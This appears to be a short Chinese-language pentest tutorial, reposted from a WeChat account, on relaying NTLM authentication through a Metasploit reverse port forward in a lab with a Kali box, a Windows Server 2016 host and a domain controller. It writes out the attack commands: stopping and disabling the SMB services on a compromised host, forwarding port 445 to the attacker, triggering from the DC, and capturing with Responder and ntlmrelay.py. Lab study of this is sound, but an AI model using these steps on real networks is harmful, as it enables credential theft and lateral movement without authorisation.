通过MSF端口转发代理Ntlm Relay

我们可以通过使用MSF端口转发的功能来代理Ntlm Relay。

测试环境如下：

kali 192.168.213.149win2016 10.10.211.133 192.168.213.157dc 10.10.211.130

我们这台kali机器是无法访问10.10.211.0/24这个网段的。

现在比如说我们拿到了win2016这台机器，需要来做Ntlm Relay的话，就需要端口转发了，这也算是第二种方式吧。

但是这种方式我感觉挺玄学的，有时候测试是可以成功的，但是有时候不行。

首先我们需要运行的所有服务以使其释放，如下命令。

sc stop netlogonsc stop lanmanserversc config lanmanserver start= disabledsc stop lanmanworkstationsc config lanmanworkstation start= disabled

执行完成之后重启，那么你肯定想问实战中总不可能直接重启吧，这就是玄学所在，因为我尝试过没有重启也可以成功。

执行完成之后，我们做一个端口转发。

将目标的445端口转发到我们本地的445.

portfwd add -R -L 0.0.0.0 -l 445 -p 445

现在我们在DC这里也就是10.10.211.130这里使用dir进行触发。

dir \10.10.211.133share

使用Responder进行监听。

这里指定的网卡是lo  也就是127.0.0.1 表示本地。

responder -I lo

当我们请求10.10.211.133的445端口的时候，他会转发到我们本地的445。

我们使用ntlmrelay.py也是一样的。

因为我这里只有两台机器，所以我们将中继给10.10.211.130 但是还是在10.10.211.130中触发。

当我们触发的时候可以看到已经有请求过来了。

如果感兴趣的话可以去测测关闭服务之后不重启看能不能生效。

                                                   快来找我学习吧！！！

原文始发于微信公众号（Relay学安全）：通过MSF端口转发代理Ntlm Relay